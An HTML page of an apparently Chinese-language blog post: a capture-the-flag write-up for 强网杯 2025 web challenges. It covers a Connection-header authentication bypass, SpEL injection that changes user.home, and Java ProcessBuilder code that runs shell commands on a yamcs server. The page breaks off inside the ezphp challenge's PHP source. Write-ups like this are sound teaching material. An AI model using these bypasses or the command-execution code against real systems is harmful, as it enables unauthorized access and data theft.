

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/onehang.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="onehang">
  <meta name="keywords" content="">
  
    <meta name="description" content="前言被薄纱了，web只出了最简单的三题，做php的时候是真被绕晕了…. SecretVault这题实现了一个密码本的功能，go实现一个代理，后端用python 首先找flag在哪 1234567891011121314151617181920212223if not User.query.first():    salt &#x3D; secrets.token_bytes(16)    password">
<meta property="og:type" content="article">
<meta property="og:title" content="强网杯2025wp">
<meta property="og:url" content="http://example.com/2025/10/21/%E5%BC%BA%E7%BD%91%E6%9D%AF2025wp/index.html">
<meta property="og:site_name" content="onehang&#39;s blogs">
<meta property="og:description" content="前言被薄纱了，web只出了最简单的三题，做php的时候是真被绕晕了…. SecretVault这题实现了一个密码本的功能，go实现一个代理，后端用python 首先找flag在哪 1234567891011121314151617181920212223if not User.query.first():    salt &#x3D; secrets.token_bytes(16)    password">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2025/10/21/%E5%BC%BA%E7%BD%91%E6%9D%AF2025wp/image-20251021202520978-17610495279431.png">
<meta property="og:image" content="http://example.com/2025/10/21/%E5%BC%BA%E7%BD%91%E6%9D%AF2025wp/image-20251019163923028.png">
<meta property="og:image" content="http://example.com/2025/10/21/%E5%BC%BA%E7%BD%91%E6%9D%AF2025wp/image-20251019164059019.png">
<meta property="og:image" content="http://example.com/2025/10/21/%E5%BC%BA%E7%BD%91%E6%9D%AF2025wp/image-20251019165602847.png">
<meta property="og:image" content="http://example.com/2025/10/21/%E5%BC%BA%E7%BD%91%E6%9D%AF2025wp/image-20251019170116771.png">
<meta property="og:image" content="http://example.com/2025/10/21/%E5%BC%BA%E7%BD%91%E6%9D%AF2025wp/image-20251019170231800.png">
<meta property="og:image" content="http://example.com/2025/10/21/%E5%BC%BA%E7%BD%91%E6%9D%AF2025wp/image-20251019170653918.png">
<meta property="og:image" content="http://example.com/2025/10/21/%E5%BC%BA%E7%BD%91%E6%9D%AF2025wp/image-20251019170756581.png">
<meta property="og:image" content="http://example.com/2025/10/21/%E5%BC%BA%E7%BD%91%E6%9D%AF2025wp/image-20251019171020573.png">
<meta property="og:image" content="http://example.com/2025/10/21/%E5%BC%BA%E7%BD%91%E6%9D%AF2025wp/image-20251019171335581.png">
<meta property="og:image" content="http://example.com/2025/10/21/%E5%BC%BA%E7%BD%91%E6%9D%AF2025wp/image-20251019171354952.png">
<meta property="og:image" content="http://example.com/2025/10/21/%E5%BC%BA%E7%BD%91%E6%9D%AF2025wp/image-20251022102436027.png">
<meta property="article:published_time" content="2025-10-21T12:11:18.000Z">
<meta property="article:modified_time" content="2025-10-22T03:16:06.755Z">
<meta property="article:author" content="onehang">
<meta property="article:tag" content="wp">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/2025/10/21/%E5%BC%BA%E7%BD%91%E6%9D%AF2025wp/image-20251021202520978-17610495279431.png">
  
  
  
  <title>强网杯2025wp - onehang&#39;s blogs</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>onehang</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="强网杯2025wp"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-10-21 20:11" pubdate>
          2025年10月21日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          30 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">强网杯2025wp</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="前言"><a href="/2025/10/21/强网杯2025wp/#前言" class="headerlink" title="前言"></a>前言</h1><p>被薄纱了，web只出了最简单的三题，做php的时候是真被绕晕了….</p>
<h1 id="SecretVault"><a href="/2025/10/21/强网杯2025wp/#SecretVault" class="headerlink" title="SecretVault"></a>SecretVault</h1><p>这题实现了一个密码本的功能，go实现一个代理，后端用python</p>
<p>首先找flag在哪</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> User.query.first():<br>    salt = secrets.token_bytes(<span class="hljs-number">16</span>)<br>    password = secrets.token_bytes(<span class="hljs-number">32</span>).<span class="hljs-built_in">hex</span>()<br>    password_hash = hash_password(password, salt)<br>    user = User(<br>        <span class="hljs-built_in">id</span>=<span class="hljs-number">0</span>,<br>        username=<span class="hljs-string">&#x27;admin&#x27;</span>,<br>        password_hash=password_hash,<br>        salt=base64.b64encode(salt).decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>),<br>    )<br>    db.session.add(user)<br>    db.session.commit()<br><br>    flag = <span class="hljs-built_in">open</span>(<span class="hljs-string">&#x27;/flag&#x27;</span>).read().strip()<br>    flagEntry = VaultEntry(<br>        user_id=user.<span class="hljs-built_in">id</span>,<br>        label=<span class="hljs-string">&#x27;flag&#x27;</span>,<br>        login=<span class="hljs-string">&#x27;flag&#x27;</span>,<br>        password_encrypted=fernet.encrypt(flag.encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)).decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>),<br>        notes=<span class="hljs-string">&#x27;This is the flag entry.&#x27;</span>,<br>    )<br>    db.session.add(flagEntry)<br>    db.session.commit()<br></code></pre></td></tr></table></figure>

<p>flag就在admin的密码里，所以想那道flag就必须以admin登录</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/dashboard&#x27;</span></span>)</span><br><span class="hljs-meta">@login_required</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dashboard</span>():<br>    user = g.current_user<br>    entries = [<br>        &#123;<br>            <span class="hljs-string">&#x27;id&#x27;</span>: entry.<span class="hljs-built_in">id</span>,<br>            <span class="hljs-string">&#x27;label&#x27;</span>: entry.label,<br>            <span class="hljs-string">&#x27;login&#x27;</span>: entry.login,<br>            <span class="hljs-string">&#x27;password&#x27;</span>: fernet.decrypt(entry.password_encrypted.encode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)).decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>),<br>            <span class="hljs-string">&#x27;notes&#x27;</span>: entry.notes,<br>            <span class="hljs-string">&#x27;created_at&#x27;</span>: entry.created_at,<br>        &#125;<br>        <span class="hljs-keyword">for</span> entry <span class="hljs-keyword">in</span> user.vault_entries<br>    ]<br>    <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&#x27;dashboard.html&#x27;</span>, username=user.username, entries=entries)<br></code></pre></td></tr></table></figure>



<p>这个接口会展示该用户的所有密码，如果我们的身份是admin就可以访问到flag，分析一下鉴权方式，显然是在装饰器login_required里面校验的用户身份</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">def</span> <span class="hljs-title function_">login_required</span>(<span class="hljs-params">view_func</span>):<br><span class="hljs-meta">    @wraps(<span class="hljs-params">view_func</span>)</span><br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">wrapped</span>(<span class="hljs-params">*args, **kwargs</span>):<br>        uid = request.headers.get(<span class="hljs-string">&#x27;X-User&#x27;</span>, <span class="hljs-string">&#x27;0&#x27;</span>)<br>        <span class="hljs-built_in">print</span>(uid)<br>        <span class="hljs-keyword">if</span> uid == <span class="hljs-string">&#x27;anonymous&#x27;</span>:<br>            flash(<span class="hljs-string">&#x27;Please sign in first.&#x27;</span>, <span class="hljs-string">&#x27;warning&#x27;</span>)<br>            <span class="hljs-keyword">return</span> redirect(url_for(<span class="hljs-string">&#x27;login&#x27;</span>))<br>        <span class="hljs-keyword">try</span>:<br>            uid_int = <span class="hljs-built_in">int</span>(uid)<br>        <span class="hljs-keyword">except</span> (TypeError, ValueError):<br>            flash(<span class="hljs-string">&#x27;Invalid session. Please sign in again.&#x27;</span>, <span class="hljs-string">&#x27;warning&#x27;</span>)<br>            <span class="hljs-keyword">return</span> redirect(url_for(<span class="hljs-string">&#x27;login&#x27;</span>))<br>        user = User.query.filter_by(<span class="hljs-built_in">id</span>=uid_int).first()<br>        <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> user:<br>            flash(<span class="hljs-string">&#x27;User not found. Please sign in again.&#x27;</span>, <span class="hljs-string">&#x27;warning&#x27;</span>)<br>            <span class="hljs-keyword">return</span> redirect(url_for(<span class="hljs-string">&#x27;login&#x27;</span>))<br><br>        g.current_user = user<br>        <span class="hljs-keyword">return</span> view_func(*args, **kwargs)<br><br>    <span class="hljs-keyword">return</span> wrapped<br><br></code></pre></td></tr></table></figure>

<p>不难注意到</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">uid = request.headers.get(<span class="hljs-string">&#x27;X-User&#x27;</span>, <span class="hljs-string">&#x27;0&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>uid的从X-User头获取，如果没获取到就设置为0而0就代表admin，那么漏洞点很明显了，接下来只需要找到一个办法，让后端获取不到X-User,显然需要从代理入手,代理设置X-User的方式如下</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs go">authorizer := &amp;httputil.ReverseProxy&#123;Director: <span class="hljs-function"><span class="hljs-keyword">func</span><span class="hljs-params">(req *http.Request)</span></span> &#123;<br>	req.URL.Scheme = <span class="hljs-string">&quot;http&quot;</span><br>	req.URL.Host = <span class="hljs-string">&quot;127.0.0.1:5000&quot;</span><br><br>	uid := GetUIDFromRequest(req)<br>	log.Printf(<span class="hljs-string">&quot;Request UID: %s, URL: %s&quot;</span>, uid, req.URL.String())<br>	req.Header.Del(<span class="hljs-string">&quot;Authorization&quot;</span>)<br>	req.Header.Del(<span class="hljs-string">&quot;X-User&quot;</span>)<br>	req.Header.Del(<span class="hljs-string">&quot;X-Forwarded-For&quot;</span>)<br>	req.Header.Del(<span class="hljs-string">&quot;Cookie&quot;</span>)<br><br>	<span class="hljs-keyword">if</span> uid == <span class="hljs-string">&quot;&quot;</span> &#123;<br>		req.Header.Set(<span class="hljs-string">&quot;X-User&quot;</span>, <span class="hljs-string">&quot;anonymous&quot;</span>)<br>	&#125; <span class="hljs-keyword">else</span> &#123;<br>		req.Header.Set(<span class="hljs-string">&quot;X-User&quot;</span>, uid)<br>	&#125;<br>&#125;&#125;<br></code></pre></td></tr></table></figure>

<p>没有什么明显的问题，这里可以拷打一下ai，找一下有没有什么办法让代理不转发请求头到后端</p>
<p>搜到了一篇2019年的文章</p>
<p><a target="_blank" rel="noopener" href="https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers?utm_source=chatgpt.com">https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers?utm_source=chatgpt.com</a></p>
<p>简单来说，就是当你在Connection里面填加了一个请求头的名字，代理就不会把这个请求头转发到后端</p>
<p>如果我们Connection:X-User,那么代理就不会把X-User转发到后端，这样uid就会被设置为0</p>
<p><img src="/2025/10/21/强网杯2025wp/image-20251021202520978-17610495279431.png" srcset="/img/loading.gif" lazyload alt="image-20251021202520978"></p>
<h1 id="bbjv"><a href="/2025/10/21/强网杯2025wp/#bbjv" class="headerlink" title="bbjv"></a>bbjv</h1><p>用jadx反编译jar包</p>
<p><img src="/2025/10/21/强网杯2025wp/image-20251019163923028.png" srcset="/img/loading.gif" lazyload alt="image-20251019163923028"></p>
<p>获取flag的逻辑很简单，System.getProperty(“user.home”)获取用户的主目录，返回主目录下的flag.txt文件</p>
<p>而flag在</p>
<p><img src="/2025/10/21/强网杯2025wp/image-20251019164059019.png" srcset="/img/loading.gif" lazyload alt="image-20251019164059019"></p>
<p>两种思路，rce，把flag.txt移动到用户的主目录下，或者更改用户的主目录到tmp</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-type">String</span> <span class="hljs-variable">result</span> <span class="hljs-operator">=</span> <span class="hljs-built_in">this</span>.evaluationService.evaluate(rule);<br></code></pre></td></tr></table></figure>

<p>调用evaluate执行用户传入的rule</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs java">    <span class="hljs-keyword">public</span> String <span class="hljs-title function_">evaluate</span><span class="hljs-params">(String expression)</span> &#123;<br>        <span class="hljs-keyword">try</span> &#123;<br>            <span class="hljs-type">Object</span> <span class="hljs-variable">result</span> <span class="hljs-operator">=</span> <span class="hljs-built_in">this</span>.parser.parseExpression(expression, <span class="hljs-keyword">new</span> <span class="hljs-title class_">TemplateParserContext</span>()).getValue(<span class="hljs-built_in">this</span>.context);<br>            <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;Result: &quot;</span> + String.valueOf(result);<br>        &#125; <span class="hljs-keyword">catch</span> (Exception e) &#123;<br>            <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;Error: &quot;</span> + e.getMessage();<br>        &#125;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>明显存在spel表达式注入</p>
<p>先尝试rce</p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scss">#&#123;<span class="hljs-built_in">T</span>(java.lang.String)&#125;<br></code></pre></td></tr></table></figure>



<p><img src="/2025/10/21/强网杯2025wp/image-20251019165602847.png" srcset="/img/loading.gif" lazyload alt="image-20251019165602847"></p>
<p>测试了一下发现无论用啥都会返回找不到包，再阅读源码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-meta">@Configuration</span><br><span class="hljs-comment">/* loaded from: app.jar:BOOT-INF/classes/com/ctf/gateway/config/SpelConfig.class */</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">SpelConfig</span> &#123;<br>    <span class="hljs-meta">@Bean(&#123;&quot;systemProperties&quot;&#125;)</span><br>    <span class="hljs-keyword">public</span> Properties <span class="hljs-title function_">systemProperties</span><span class="hljs-params">()</span> &#123;<br>        <span class="hljs-keyword">return</span> System.getProperties();<br>    &#125;<br><br>    <span class="hljs-meta">@Bean(&#123;&quot;restrictedEvalContext&quot;&#125;)</span><br>    <span class="hljs-keyword">public</span> EvaluationContext <span class="hljs-title function_">restrictedEvaluationContext</span><span class="hljs-params">(<span class="hljs-meta">@Qualifier(&quot;systemProperties&quot;)</span> Properties systemProperties)</span> &#123;<br>        <span class="hljs-type">SimpleEvaluationContext</span> <span class="hljs-variable">simpleContext</span> <span class="hljs-operator">=</span> SimpleEvaluationContext.forPropertyAccessors(<span class="hljs-keyword">new</span> <span class="hljs-title class_">SecurePropertyAccessor</span>()).build();<br>        simpleContext.setVariable(<span class="hljs-string">&quot;systemProperties&quot;</span>, systemProperties);<br>        <span class="hljs-keyword">return</span> simpleContext;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>发现定义了一个名为<code>systemProperties</code>的 Bean，返回当前 JVM 的系统属性</p>
<p>定义了一个名为<code>restrictedEvalContext</code>的 Bean</p>
<p>创建<code>SimpleEvaluationContext</code>：这是一个受限的 SpEL 上下文（相比<code>StandardEvaluationContext</code>更安全），仅支持基本的表达式功能，限制了对复杂对象的访问，所以没办法rce了</p>
<p>而将<code>systemProperties</code>对象作为变量<code>systemProperties</code>放入上下文，使得 SpEL 表达式中可以通过<code>#systemProperties</code>引用系统属性</p>
<p>所以先看一下user.home</p>
<p><img src="/2025/10/21/强网杯2025wp/image-20251019170116771.png" srcset="/img/loading.gif" lazyload alt="image-20251019170116771"></p>
<p>更改user.home的值为&#x2F;tmp</p>
<p><img src="/2025/10/21/强网杯2025wp/image-20251019170231800.png" srcset="/img/loading.gif" lazyload alt="image-20251019170231800"></p>
<p>拿到flag</p>
<h1 id="yamcs"><a href="/2025/10/21/强网杯2025wp/#yamcs" class="headerlink" title="yamcs"></a>yamcs</h1><p>附件只有一个docker，感觉像找cve，搜一下yamcs</p>
<p>Yamcs 是一个开源软件框架 用于航天器的指挥和控制， 卫星、有效载荷、地面站 和地面设备。</p>
<p><img src="/2025/10/21/强网杯2025wp/image-20251019170653918.png" srcset="/img/loading.gif" lazyload alt="image-20251019170653918"></p>
<p>手册里提到了非常多的web接口</p>
<p>简单看了一下环境中的功能点，Algorithms接口可以编写java代码，他会执行代码并输出到out0</p>
<p><img src="/2025/10/21/强网杯2025wp/image-20251019170756581.png" srcset="/img/loading.gif" lazyload alt="image-20251019170756581"></p>
<p>尝试通过执行命令来获取flag</p>
<p><img src="/2025/10/21/强网杯2025wp/image-20251019171020573.png" srcset="/img/loading.gif" lazyload alt="image-20251019171020573"></p>
<p>报错了，原因是没有对应的包，只能使用 Java 内置的 ProcessBuilder 了</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">try</span> &#123;<br>    <span class="hljs-comment">// 执行命令：cat /flag</span><br>    java.lang.<span class="hljs-type">ProcessBuilder</span> <span class="hljs-variable">pb</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">java</span>.lang.ProcessBuilder(<span class="hljs-string">&quot;/bin/sh&quot;</span>, <span class="hljs-string">&quot;-c&quot;</span>, <span class="hljs-string">&quot;cat /flag&quot;</span>);<br>    pb.redirectErrorStream(<span class="hljs-literal">true</span>); <span class="hljs-comment">// 合并标准错误到标准输出，避免进程阻塞</span><br>    java.lang.<span class="hljs-type">Process</span> <span class="hljs-variable">p</span> <span class="hljs-operator">=</span> pb.start();<br><br>    <span class="hljs-comment">// 读取命令输出</span><br>    java.io.<span class="hljs-type">BufferedReader</span> <span class="hljs-variable">reader</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">java</span>.io.BufferedReader(<br>        <span class="hljs-keyword">new</span> <span class="hljs-title class_">java</span>.io.InputStreamReader(p.getInputStream(), java.nio.charset.StandardCharsets.UTF_8)<br>    );<br>    java.lang.<span class="hljs-type">StringBuilder</span> <span class="hljs-variable">sb</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">java</span>.lang.StringBuilder();<br>    String line;<br>    <span class="hljs-keyword">while</span> ((line = reader.readLine()) != <span class="hljs-literal">null</span>) &#123;<br>        sb.append(line).append(<span class="hljs-string">&quot;\n&quot;</span>);<br>    &#125;<br><br>    <span class="hljs-comment">// 等待命令执行完成，获取退出码</span><br>    <span class="hljs-type">int</span> <span class="hljs-variable">exitCode</span> <span class="hljs-operator">=</span> p.waitFor();<br>    sb.append(<span class="hljs-string">&quot;EXIT_CODE=&quot;</span>).append(exitCode);<br><br>    <span class="hljs-comment">// 输出结果</span><br>    out0.setStringValue(sb.toString());<br><br>&#125; <span class="hljs-keyword">catch</span> (java.io.IOException e) &#123;<br>    System.out.println(<span class="hljs-string">&quot;IOException: &quot;</span> + e.getMessage());<br>&#125; <span class="hljs-keyword">catch</span> (java.lang.InterruptedException e) &#123;<br>    System.out.println(<span class="hljs-string">&quot;Interrupted: &quot;</span> + e.getMessage());<br>&#125;<br></code></pre></td></tr></table></figure>

<p><img src="/2025/10/21/强网杯2025wp/image-20251019171335581.png" srcset="/img/loading.gif" lazyload alt="image-20251019171335581"></p>
<p>没报错了，看下输出结果</p>
<p><img src="/2025/10/21/强网杯2025wp/image-20251019171354952.png" srcset="/img/loading.gif" lazyload alt="image-20251019171354952"></p>
<p>拿到flag</p>
<h1 id="ezphp-赛后"><a href="/2025/10/21/强网杯2025wp/#ezphp-赛后" class="headerlink" title="ezphp(赛后)"></a>ezphp(赛后)</h1><p>这题比赛的时候被绕晕了，没做出来，赛后参考几个大佬的解法尝试复现了一下，总的来看这题就三步</p>
<p>第一步：上传一个文件，调用readflag进行文件包含</p>
<p>第二步：绕过文件上传的内容检测</p>
<p>第三步：suid提权</p>
<p>将源码精简一下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">test</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$readflag</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$f</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$key</span>;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span 